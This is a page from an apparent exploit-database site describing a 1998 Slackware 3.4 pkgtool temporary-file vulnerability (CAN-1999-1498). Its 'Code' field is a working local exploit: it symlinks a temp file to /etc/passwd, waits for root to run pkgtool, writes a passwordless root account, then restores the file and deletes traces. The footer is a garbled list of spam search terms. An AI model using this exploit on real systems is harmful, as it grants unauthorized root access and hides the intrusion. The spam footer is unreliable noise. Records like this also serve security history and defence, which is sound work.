about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Slackware pkgtool temporary file Vulnerability


Title Slackware pkgtool temporary file Vulnerability
Published 1998-04-06-12:00AM
Updated 1999-06-01-12:00AM
Class Access Validation Error
CVE   CAN-1999-1498
Remote  No
Local  Unknown
Credit  Made public by neonhaze <neonhaze@mailcity.com> and <bmacdonald@syd.auracom.com> in the BugTraq mailing list.
Vulnerable  Slackware Linux 3.4
Not Vulnerable  
Code   $ cp /etc/passwd /tmp/passwd
$ ln -s /tmp/reply /etc/passwd
< wait for root to run pkgtool >
$ echo toor::0:0::/:/bin/sh > /etc/passwd
$ su - toor
# cp /tmp/passwd /etc/passwd
# rm /tmp/reply /tmp/passwd
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 21:29:16 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo anemal.por administra alexa.xue2 SEXY PIC shop350322 2...n.com/ WWW.3PICS. Download s www.lswz88 Sex pictur six samira xiaomei.04 Sixy gril Vidio sara WWW.3PICS. meera jasm cialis and 2...n.com/ 180tt com_phpsho Worldsexy 2...n.com/ 200 /compo Www.live24 2...n.com/ 2...n.com/ www.ggask. var Microsoft administra sign 2...n.com/ girlshavin news for C arab hot trisha bat www.anthon HOT SEXY V /search/ex maxcpm.inf 2...n.com/ www.angles WWW.SEXSEX php-...at_ solpot.htm 2...n.com/ PRITEZINTA Foto jilba SHOUTcast